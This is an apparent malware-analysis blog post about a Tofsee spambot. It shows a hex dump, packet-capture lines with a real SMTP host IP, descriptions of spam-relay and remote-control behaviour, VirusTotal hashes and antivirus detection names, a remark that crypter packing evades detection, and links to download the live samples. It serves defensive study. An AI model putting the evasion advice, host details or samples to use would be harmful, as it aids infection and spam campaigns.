000511ED 52 46 02 49 ce d1 5d 62 27 85 a8 a6 a5 10 d6 aa RF.I..]b '.......
000511FD 1f 6a b9 cf 3b 0d 1f e5 61 cb c7 d9 8e a8 ca 75 .j..;... a......u
0005120D 11 86 64 6b 65 f5 23 e0 65 9e 03 18 e2 43 12 ec ..dke.#. e....C..
0005121D 80 4c ca ad 88 78 c7 b1 7c 1a 33 44 77 fc a1 e1 .L...x.. |.3Dw...
0005122D 5f 2a ad 14 0c a3 73 80 77 e1 e8 46 f8 7c 42 ae _*....s. w..F.|B.
0005123D 35 5d 33 d5 19 23 fd 01 d3 fe 5]3..#.. ..
The binary also made you communicate with 188.40.81.203 via SMTP protocol..
// Atempt to establish the SMTP connection from 188.40.81.203 to Infected PC
422 269.987058 188.40.81.203 TestPC TCPsmtp > neod1 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 30 23 30 40 00 80 06 e1 c3 c0 a8 07 54 da 6e .0#0@... .....T.n
0020 53 69 04 17 00 19 20 e7 9f e9 00 00 00 00 70 02 Si.... . ......p.
0030 40 00 88 4a 00 00 02 04 05 b4 01 01 04 02 @..J.... ......
The picture of the PCAP analysis (click to enlarge): You can download the PCAP data in the link provided at he bottom of this page :-) ↑If you see all of the previously mentioned captured network traffic, you'll know this malware is a positive spambot. But not only that, it tried to access your PC via TCP/1053 a remote protocol for the remote controls. Thus, as a bonus it sends you additional malicious code. Practically it uses your PC as a remote spam relay traffic, those spam emails will be relayed into your nearest mail server if exist, or will use other mail servers to relay the spam. Evil enough isn't it? (again, see the text report in the dropbox url above for the details)

Malware Detection Reference Analysis

Virus Total is providing you a very good base of detection ratio for the new- malware, to measure the response of the AntiVirus products against new threat. I often use VT as reference for the timely monitoring purpose of malware detection. At the time this sample was detected, VT of the malware binary score was 3/44
MD5: 268bece218187c189c2322d6f7d21efb File size: 146.4 KB ( 149879 bytes ) File name: unixfreaxjp-sample3 File type: Win32 EXE Detection : 3 / 44 Analysisdate: 2012-11-16 14:02:11 UTC ( 0 分 ago ) URL ---->>>>>>>[CLICK]
@Xylit0l was uploading the unpacked binary, which detected with VT: 27 / 44
MD5: 09a18c6e09bb880922e9ed451d6eb6a0 File size: 68.0 KB ( 69632 bytes ) File name: Dumpedfinal_.exe File type: Win32 EXE Tags: peexe Detection: 27 / 44 Analysis date: 2012-11-17 07:13:25 UTC ( 1 時間, 23 分 ago ) URL ---->>>>>>>>[CLICK]
↑But the detection malware names is so confusing, Not one of those mentioned the SpamBot at all↓
MicroWorld-eScan : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
McAfee : Artemis!09A18C6E09BB
K7AntiVirus : Trojan-Downloader
F-Prot : W32/Bloop.A.gen!Eldorado
Symantec : Infostealer
Norman : W32/Malware
TotalDefense : Win32/Tofsee!generic
Kaspersky : HEUR:Trojan.Win32.Generic
BitDefender : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
Sophos : Sus/Behav-169
F-Secure : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
DrWeb : Trojan.Spambot.11176
VIPRE : BehavesLike.Win32.Malware.eah (mx-v)
AntiVir : TR/Hijacker.Gen
McAfee-GW-Edition: Artemis!09A18C6E09BB
Emsisoft : Gen:Win32.ExplorerHijack.eqX@aWv8eAi (B)
ESET-NOD32 : a variant of Win32/Agent.OBA
Kingsoft : Win32.Troj.Undef.(kcloud)
Microsoft : Backdoor:Win32/Tofsee.F
AhnLab-V3 : Spyware/Win32.Generic
GData : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
Commtouch : W32/Bloop.A.gen!Eldorado
ByteHero : Virus.Win32.Heur.c
PCTools : Trojan-PSW.Generic!rem
Rising : Backdoor.Tofsee!2B2B
AVG : unknown virus Win32/DH{AAkP}
Panda : Trj/CI.A
We must learn that a malware with 27/44 detection ratio can be packed with crypter into a different binary to get almost zero detection for the infection purpose. [POINT!] I also uploaded obfuscated exploit kit's JavaScript infector to VT, And with no shocky, as per expected, to realize the score was only 0/44:
MD5: 4396ab2186b4358e2698c1665a16298d File size: 5.0 KB ( 5130 bytes ) File name: sample2 File type: HTML Detection: 0 / 44 Analysisdate: 2012-11-17 07:45:09 UTC ( 0 分 ago ) URL ---->>>>>>>>[CLICK]
↑So this is why so many people got infected easily. If we count this infection time well, it was compiled in 15th, and this was started to be exposed it on 16th-17th. Don't you wonder, how many people got infected by this malware within undetected period 2+(two) days?

Resources and samples

For the research and study purpose we decided to share our analysis data, as per written in the below details. Use these data well to analysis this malware - by yourself, and kindly inform us if you find another result by commenting to this - blog. The sample can be downloaded here -->>[CLICK]The unpacked sample (thanks2 @Xylit0l) can be downloaded here -->>[CLICK]The PCAP/Network Traffic can be downloaded here -->>[CLICK]While the full regshot data can be downloaded here -->>[CLICK]

Reference & studies

Anubis sandbox result (not so useful) is here -->>[CLICK]Comodo sandbox result (not so useful) is here -->>>[CLICK]
#MalwareMustDie!!!